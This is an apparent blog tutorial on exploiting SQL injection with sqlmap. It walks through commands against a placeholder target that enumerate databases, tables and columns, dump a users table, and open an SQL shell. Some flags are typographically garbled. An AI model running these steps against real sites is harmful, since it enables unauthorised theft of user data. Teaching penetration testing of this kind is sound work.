SQL Injection
Using sqlmap
Hello everyone, Today I am gonna explain you the most critical Vulnerability Sqlinjection exploitation where we retrieve the data from the database and able to run the sql shell.
Before going with the attacks scenario, lets talk about the basic knowledge about what is sql inection?
What is SQL injection?
Let’s talk about the sql injection what it is? I hope you must be aware about it.
SQL Injection also known as sqli, it is a code injection technique where an attacker executes malicious SQL queries that control a web application database. With the right set of queries, a user can gain access to information stored in database. SQLMAP tests whether a ‘GET’ parameter is vulnerable to SQL injection.
It is one of the critical and dangerous attacks which carries out on top of the list.., we all know about the OWASP TOP 10 where they list out the TOP 10 vulnerabilities.. and you will find out that sql injection is the lead vulnerability in OWASP.
SQLMAP is an open source penetration tool which comes in-build with the Kali Linux operating system. It automates the process of detecting and exploiting flaws or weakness in SQL injection and gain the server database data. It automatically scan and exploit SQL injection.
Attack Scenerio
During a recent pentesting I came across with sql injection, which was further exploited using the sqlmap tool.
SQLMAP
First run the tool sqlmap in kali linux.
We will look out for the database in the application. Simply run command
sqlmap -u “TARGETURL” -dbs
With the above command we were not able to detect it. But with the level and risk we were successfully able to detect database. Now you might be confused what is level and risk are…
Sometimes sqlmap is not able to detect the injection in default settings. Than level and risk comes into picture to forcefully scan and detect the database.
(Risk allows the type of payloads used by the tool. By default, it uses value 1 and can be configured up to level 3. Level 3, being the maximum, includes some heavy SQL queries.)
( Level defines the number of checks/payload to be performed. The value ranges from 1 to 5. 5, being the maximum, includes large number of payloads in the scan.)
So our modified commands will be,
sudo sqlmap -u “TARGETURL” -db — risk=3 — level=4
You can see below we have successfully detect the database
After detecting it, we will be using that database and will search for the column available in the database.
sudo sqlmap -u “TARGETURL” -dbs — risk=3 —level=4 -D “DATABASENAME” — tables
Oh!!! you can see several tables are there in database.
To find column we run,
sudo sqlmap -u “TARGETURL” -dbs — risk=3 — level=4 -D “DATABASENAME”-T users — column
Yes, we got the columns in the database.
Now, as we got all the sensitive information like database name, tables, column.. we will dump all the data…
sqlmap -u “TARGETURL” -dbs — risk=3 — level=4 -D “DATABASENAME”-T users -C emai-id — dump
Now try to get the sql shell access, to do so run,
sqlmap -u “TARGETURL” — sql-shell — risk=2 — level=4
BOOM!!! we got the access of shell. Now, as we performed earlier we are known to tables and columns names available in the database.
We can run the query to retrieve data,
select * from users
Thank You!! All for spending your precious time and reading this article.
Stay tuned for next attack.
